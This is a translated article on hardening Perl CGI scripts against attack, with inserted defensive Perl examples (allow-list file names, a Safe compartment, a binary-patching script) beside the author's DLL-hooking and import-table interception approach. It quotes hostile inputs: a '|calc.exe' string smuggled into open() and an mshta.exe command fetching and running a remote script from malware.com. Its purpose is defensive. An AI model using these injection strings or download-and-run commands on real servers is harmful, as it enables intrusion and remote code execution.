Protecting Perl

Vulnerable CGI scripts are a remarkable hole in computer systems. Can we "plug" it with 100% reliability, once and for all? This article analyses the merits and demerits of the existing approaches to protecting Perl and proposes a protection method based on a "hacker's" trick (I fight fire with fire!): substitution of the system functions of a process.


If you program (or are going to program) Internet applications in Perl, you have certainly come across information describing this language's vulnerability to hacker attacks. The elementary script found in any Perl tutorial turns out in practice to be a "wide-open gate" for hackers, both highly experienced and beginning. For example, this fragment of code, which simply prints the contents of the named file

open (f, $filename);    # two-argument open: the mode is taken from $filename itself
while (<f>)
{
    print;
}



can in fact perform other actions as well. Feed it the line "|calc.exe" as input, and you launch the standard calculator. Launching standard programs (such as calc.exe or notepad.exe) on a remote server makes little sense unless you know about the hacker's ideal master key: the utility mshta.exe. It ships with every standard Windows installation and makes it easy to download any code into the attacked system and execute it there.


For example, executing the command

mshta.exe http://www.malware.com/foobar.hta



on the system downloads the file foobar.hta onto the computer and executes it as a VBS script. This example creates and launches a harmless (according to the assurances of the operators of the site malware.com) MS-DOS application that shows the standard algorithm for generating a flame. Naturally, in the same way one could download and execute any executable file, even one not yet present on the system.

Who needs it?


I would like to dispel a bias held by some system administrators: that nobody needs to break into their server. The iron argument is a reference to Inconspicuous Joe ("we are not such an important bird that anyone would break into us"). In reality, breaking into any (any!) server can be of use to a hacker, because it opens up remarkable new opportunities:

- to send a couple of gigabytes of spam mail out from the vulnerable server;

- to set up on the vulnerable server a "warez" dump of unlicensed software, music and video;

- to carry out complex and interesting mathematical calculations (usually cryptographic computations to recover someone's key, drawing a whole set of cracked machines into the process so that it goes faster);

- to "crack", or to "swamp" with junk requests (a denial-of-service attack), a more important server (for example, the server of some bank or government body).


Thus vulnerable servers, whatever their importance, pose no less danger than the people who are able to use these servers for their intended purpose. :-)

Why is Perl vulnerable?


It is hard to give a rational explanation of why the open function in Perl treats the pipe symbol | as a command to launch a program: Perl in general is a rather irrational (but flexible and compact) language. :-) Larry Wall, the author of Perl, jokingly decodes its name as Pathologically Eclectic Rubbish Lister; we can only wish that its subsequent versions develop in the direction of greater safety, unambiguity and faultlessness of code, qualities so necessary for publicly exposed Internet applications. Certainly "pathologicalness", "eclecticism" and "rubbishness" are negative features that Larry Wall ought to struggle against. :-)

Sanitizing user input


In articles about safe programming in Perl one can find recommendations to filter user input: in particular, to delete from lines received from outside the symbol | and the other characters that have special meaning in Perl. For example, the following input sanitizer "disinfects" a file name received from outside of special and dangerous characters.

# Deny-list filter: reject the name if it contains any "dangerous" character.
# The original listing breaks off after the character class ('&' is assumed
# where the source reads "and"); the body of the condition is reconstructed.
if ($filename =~ /[<>|\-&.\/]/) {
    die "invalid file name";
}



Just look at the abundance of special characters ("squiggles") that has to be filtered for the simple operation of opening a file. Obviously one needs to be a deep expert in Perl and a very attentive person to place all the filters correctly. Since one cannot demand hundred-percent reliability from a human being, unlike from a lump of iron, the "squiggle" filters scattered around a program may in practice fail to work as a trap.
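The following script is an added example, not code from the original article. It rewrites the file-display script from the start of the article so that both weaknesses discussed so far are closed at once: open() receives its mode as a separate argument, so the name is never interpreted as a pipe, and the name is checked against an allow-list of permitted characters instead of a deny-list of dangerous ones. The document directory and the use of QUERY_STRING for the page name are assumptions for the sake of a runnable example.

```perl
#!/usr/bin/perl
# Added example (not from the original article): the file-display script
# from the start of the article, rewritten so that neither "|calc.exe" nor
# a path containing ".." can get through.  Two changes:
#  1. open() gets an explicit mode ('<') as a separate argument, so the
#     name is never inspected for '|', '>' or '<' as an open mode;
#  2. the name is checked against an allow-list (one component of letters,
#     digits, '_' and '-', ending in .html) instead of a deny-list of
#     "dangerous" characters, and is served only from one directory.
# Run as "perl -T show.pl" to add taint mode: Perl then refuses to pass
# unchecked outside input to open() at all, so a forgotten check becomes a
# run-time error instead of a silent hole; the regex capture below is what
# "untaints" the value.
use strict;
use warnings;

# Assumed location of the public pages; adjust for the real server.
my $DOC_ROOT = 'C:/inetpub/wwwroot/pages';

# Returns the validated file name, or undef if it is not acceptable.
# Everything that is not explicitly allowed is rejected.
sub safe_filename {
    my ($name) = @_;
    return undef unless defined $name;
    return undef unless $name =~ /\A([A-Za-z0-9_-]{1,60}\.html)\z/;
    return $1;
}

# Sends the named page as a CGI response; returns 1 on success, 0 otherwise.
sub show_file {
    my ($name) = @_;
    my $clean = safe_filename($name);
    unless (defined $clean) {
        print "Status: 400 Bad Request\r\nContent-Type: text/plain\r\n\r\n",
              "Bad file name.\n";
        return 0;
    }
    # Three-argument open with an explicit read mode.
    open(my $fh, '<', "$DOC_ROOT/$clean") or do {
        print "Status: 404 Not Found\r\nContent-Type: text/plain\r\n\r\n",
              "No such page.\n";
        return 0;
    };
    print "Content-Type: text/html\r\n\r\n";
    print while <$fh>;
    close $fh;
    return 1;
}

# Constructed inputs; the first is the attack string from the article.
for my $input ('|calc.exe', '../../winnt/system32/x.html', 'index.html') {
    printf STDERR "%-32s %s\n", $input,
        defined safe_filename($input) ? 'accepted' : 'rejected';
}

# Real request: the page name arrives in QUERY_STRING, e.g. show.pl?index.html
show_file($ENV{QUERY_STRING}) if defined $ENV{QUERY_STRING};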

Restricting the rights of the Web server


The Internet server and all the applications it launches, which one way or another talk to the whole outside world, must not have the rights of the administrator or of a privileged user. Giving the Web server service limited rights is a very reliable (and probably the only correct) way to protect the server from attacks from outside.


When designing an Internet site, its content should be split from the very beginning into separate folders containing:

- a) executable scripts and programs;

- b) read-only data (HTML pages);

- c) data that visitors are meant to change.


The user under whose name the Internet server runs should have access only to these folders; moreover, the scripts and the data must be write-protected (otherwise the hacker could alter the appearance and functioning of your site), and the data that external users are meant to change must be non-executable (otherwise he could create and immediately execute anything he likes in that folder). This variant of protection is theoretically "uncrackable", but in practice a beginning administrator will face a number of complications.


Thus, on Windows the web server will not start unless it is given access to the system DLLs in the folder c:\winnt\system32. And if you open them, remarkable programs like regedt32.exe, mshta.exe, etc. become accessible to the whole world. One could, of course, write the list of system DLLs the program needs on a piece of paper and grant the Internet server access only to those. But how many administrators do that (and should they have to?).


On Unix-like systems there are difficulties too (one possible problem is that port 80 is closed to processes without administrative privileges).


In any case, this protection method demands good preparation and high motivation from the system administrator, which points to a fundamental flaw in such protection: it cannot be imposed compulsorily, together with the installation of the protected program, and the reliability of the computer system depends entirely on the reliability of its weakest link, the human brain.

"Lobotomy" of Perl


A lobotomy is an operation that changes a person by damaging the frontal lobes of the brain, which are responsible for aggression. At one time this operation was applied to criminals to reduce their danger to society. The surgeon reached this area of the brain with a special instrument through the eye sockets and inflicted the necessary damage by lightly tapping the handle of the instrument with a wooden mallet (the excess blood and cellular matter was removed with a flexible probe).


We shall apply a similar operation, not to hackers (in its day it was recognised as brutal and inhumane), but to the Perl binary distribution, to "chop off" its "aggressive" reaction to the | ("pipe") symbol.


To do this we look in the Perl binary distribution for the substring "cmd.exe" (the invocation of the standard Windows NT/2000/XP shell; on Windows 9x the standard shell is named "command.com"). We are interested in the files with the extension dll in which this string occurs. If we launch Perl via perl.exe, the component we need is Perl56.dll (the name may differ depending on the version of the distribution). With any editor (I use the built-in editor of Far) we replace the substring cmd.exe with something else of the same length, for example sex.exe. With this the "pipe" symbol becomes inoperative; we can, however, still launch applications with the function system("ProgramName"). That, you see, is less compact but much safer and less aggressive. :-)


The program sex.exe should print to standard output (stdout) some kind and touching greeting for the hacker. I hope you will easily cope with its creation on your own. :-)

Interception of system calls


We have not yet warded off all the dangers lying in wait for the Perl programmer.


Suppose we want to forbid the Perl interpreter:

- launching any external programs (a wise decision; even sending mail is better done with standard Perl functions, otherwise the "lobotomy" would, to some extent, have to be performed on every program we launch);

- reading files unless the extension is ".html";

- writing files unless the extension is ".user".


Having received such a Perl distribution, even a... let us say, not entirely competent Web programmer (to demand anything else from living people we have neither the right nor the ability) will feel comfortable and, most importantly, cool-headed.


The role of the "protective layer" in this case is played by a special DLL that intercepts the system calls we specify and, if necessary, blocks them.


In the case of Perl we need to intercept the system function CreateProcessA (launching an application) from the library KERNEL32.dll, and also the function fopen (opening a file for reading or writing) from the library MSVCRT.dll.


We use the Windows system functions GetProcAddress and GetModuleHandle to obtain the addresses of the functions to be intercepted, ImageDirectoryEntryToData to obtain the address of the start of the import table, and the functions VirtualProtect and WriteProcessMemory to make changes to that table.


Armed with these keywords, you can find a ready solution on the Internet or write the "interceptor" application yourself.
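The three rules listed above (no external programs; read only .html files; write only .user files) can also be enforced without a DLL, using Perl's own Safe and Opcode modules. The following script is an added example, not part of the original article, and it swaps the article's import-table interceptor for a Safe compartment: untrusted CGI code is compiled with an operation mask that lacks open, system, exec, backticks, fork and unlink, so a forbidden call fails at compile time, and the only way to the disk is through two vetted functions shared into the compartment. The temporary directories and the sample scripts are constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example (not from the original article): the three rules from the
# section above enforced with Perl's own Safe/Opcode compartment rather than
# a DLL that rewrites the import table.  Untrusted CGI code is compiled
# inside a compartment whose operation mask omits open, system, exec,
# backticks, fork and unlink, so a forbidden call fails at compile time,
# before any statement runs.  Files are reachable only through the two
# vetted functions shared into the compartment.
use strict;
use warnings;
use Safe;
use File::Temp qw(tempdir);

# Constructed layout for this demo: two temporary directories standing in
# for the real document folders (on a server these would be fixed paths).
my $HTML_DIR = tempdir(CLEANUP => 1);   # read-only pages (*.html)
my $USER_DIR = tempdir(CLEANUP => 1);   # files visitors may change (*.user)
open(my $seed, '>', "$HTML_DIR/index.html") or die "cannot seed demo page: $!";
print $seed "<h1>hello</h1>\n";
close $seed;

# One plain path component (letters, digits, '_' and '-') with the required
# extension; anything else, including '/' and '..', is refused.
sub _checked_name {
    my ($name, $ext) = @_;
    return undef unless defined $name;
    return $1 if $name =~ /\A([A-Za-z0-9_-]{1,60}\Q$ext\E)\z/;
    return undef;
}

# Rule 2: reading is allowed only for *.html inside $HTML_DIR.
sub read_html {
    my ($name) = @_;
    my $clean = _checked_name($name, '.html')
        or die "read refused: '$name' is not a plain .html name\n";
    open(my $fh, '<', "$HTML_DIR/$clean") or die "cannot read $clean: $!\n";
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Rule 3: writing is allowed only for *.user inside $USER_DIR.
sub write_user {
    my ($name, $data) = @_;
    my $clean = _checked_name($name, '.user')
        or die "write refused: '$name' is not a plain .user name\n";
    open(my $fh, '>', "$USER_DIR/$clean") or die "cannot write $clean: $!\n";
    print $fh $data;
    close $fh or die "cannot finish writing $clean: $!\n";
    return length $data;
}

# Compile and run untrusted code under the policy.
# Returns (1, result) on success or (0, error text) when it was blocked.
sub run_guarded {
    my ($code) = @_;
    my $cpt = Safe->new;                        # default mask: no open, system,
                                                # exec, backtick, fork, unlink
    $cpt->share('&read_html', '&write_user');   # the only doors to the disk
    my $result = $cpt->reval($code);
    return (0, $@) if $@;
    return (1, $result);
}

# Constructed sample scripts: two try to start a program (Rule 1), one asks
# for a file outside the allowed pattern, one stays within the rules.
my %samples = (
    runs_program  => 'system("calc.exe"); 1',
    pipe_open     => 'open(F, "|calc.exe"); 1',
    reads_wrong   => 'read_html("../../winnt/system32/x.html")',
    allowed_calls => 'my $page = read_html("index.html");'
                   . 'write_user("guest.user", "hi"); length $page',
);

for my $name (sort keys %samples) {
    my ($ok, $out) = run_guarded($samples{$name});
    $out = '' unless defined $out;
    chomp $out;
    print "$name: ", ($ok ? "allowed, result=$out" : "blocked ($out)"), "\n";
}
```

The two program-launching samples never execute a single statement: the compartment rejects them while compiling, with an error of the form "'system' trapped by operation mask". Because read_html and write_user are compiled outside the compartment, they keep their normal rights, which is exactly the point: the policy lives in two small, reviewable functions rather than in filters scattered through every script.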

Injecting the protective DLL


The technology of dynamically linked libraries (DLLs) greatly eases the modification of Windows applications (closed source code is compensated by the fact that all function names and their entry points are not only clearly visible but also open to change). To "dock" the DLL into the process's address space I use the DLL substitution method (there are other methods too, but this one is perhaps the simplest in this case). To do this I open... correct, a text editor on the executable file Perl.exe, and change the substring Perl56.dll to romix1.dll (that is what we shall call our protective component).
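Both substring patches in this article (cmd.exe to sex.exe in Perl56.dll, and Perl56.dll to romix1.dll in Perl.exe) are the same operation: replacing bytes in a binary with a string of exactly the same length. The script below is an added example, not from the original article, that does this job instead of a hex editor; it refuses replacements of a different length (which would shift every following byte and corrupt the file), keeps a backup, and reports how many occurrences it changed. The file paths in the usage comment are assumptions; the search string must match the case in which it actually appears in the binary.

```perl
#!/usr/bin/perl
# Added example (not from the original article): same-length substring
# patching of a binary file, the scripted equivalent of the hex-editor
# replacements described in the article.
use strict;
use warnings;
use File::Copy qw(copy);

# Replace every occurrence of $old in $file with $new (same length).
# Returns the number of replacements made; dies on any inconsistency.
sub patch_same_length {
    my ($file, $old, $new) = @_;
    die "replacement must be the same length as the original\n"
        if length($old) != length($new);
    die "nothing to do: the two strings are identical\n" if $old eq $new;

    open(my $in, '<', $file) or die "cannot open $file: $!\n";
    binmode $in;                 # raw bytes, no CRLF translation on Windows
    local $/;
    my $image = <$in>;
    close $in;

    my $count = 0;
    my $pos   = 0;
    while (($pos = index($image, $old, $pos)) >= 0) {
        substr($image, $pos, length $old) = $new;   # in-place, same length
        $count++;
        $pos += length $old;
    }
    return 0 if $count == 0;     # untouched file, no backup needed

    copy($file, "$file.bak") or die "cannot write backup: $!\n";
    open(my $out, '>', $file) or die "cannot write $file: $!\n";
    binmode $out;
    print $out $image;
    close $out or die "error writing $file: $!\n";
    return $count;
}

# Usage (paths assumed for illustration):
#   perl patch.pl C:\Perl\bin\Perl56.dll cmd.exe sex.exe
#   perl patch.pl C:\Perl\bin\Perl.exe Perl56.dll romix1.dll
my ($file, $old, $new) = @ARGV;
die "usage: $0 FILE OLD NEW\n" unless defined $new;
my $n = patch_same_length($file, $old, $new);
print "$n occurrence(s) of '$old' replaced in $file\n";
```

Check the reported count against what you expect (one or two occurrences, not dozens): a large number means the string is also part of other data in the file. Remember too that the patch changes the file's hash and is lost on every Perl upgrade, so it has to be reapplied and re-verified after each update.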


I try to start Perl.exe. Of course, Perl reports that the required library romix1.dll is not found. Well, let us create it. To do this we compile a three-line Delphi program, named romix1.dpr:

library romix1;
begin
end.



This is not enough: now Perl reports an error at startup:

Perl.exe is linked to missing export Romix1.dll:RunPerl



Perl imports a single function, RunPerl, from this library, and now we create it (our "fake" will simply pass control to the "original"):

library romix1;

// The original RunPerl function from the library Perl56.dll.
procedure RunPerlOrig; external 'Perl56.dll' name 'RunPerl';

// Interceptor of the RunPerl function.
procedure RunPerl; export; stdcall;
begin
  asm
    jmp RunPerlOrig; // jump straight to the original
  end;
end;

exports RunPerl;

begin
end.



The assembler insert makes the jump to where it is needed. Now the complaints have stopped, and no change in Perl's operation is visible. But we have achieved an important result: our DLL has become a full member (if not the brain) of the running process Perl.exe. The rest is a matter of technique (more precisely, of Windows API system calls and several "spot" replacements in the import table of Perl56.dll).


You may ask: how did I find out which DLLs and functions the program imports? The answer is simple: dumpbin.exe from the Microsoft development studio.


An example of invoking this utility from the command line:

dumpbin.exe /imports perl.exe



Special questions such as the format of a Windows program's import table have been left "behind the scenes". Part of this information can be obtained from the comments in source code, and part from the literature (for example, the books of Kris Kaspersky, Jeffrey Richter and Matt Pietrek). Incidentally, sources useful to beginning hackers are more likely to be found on the Internet than in bookshops, where for some reason they sell out very quickly. :-)

Conclusion


We have tried to protect Perl, one of the most popular (though somewhat eclectic :-)) languages for CGI work, from attacks from the Internet. We did this at different levels:

- sanitizing user input;

- restricting access rights;

- substring replacement in the body of the program;

- interception of system calls.


Two more levels of protection are possible:

- recompiling Perl;

- recompiling the operating system kernel.


The effectiveness of the protection in all the cases considered goes "in increasing order".


Of course, what matters to us is not recompilation as such, but recompilation with the introduction of protective checks. Our goal is to introduce these checks by one means or another, even inhumane and "hacker-like" ones. With a wooden mallet.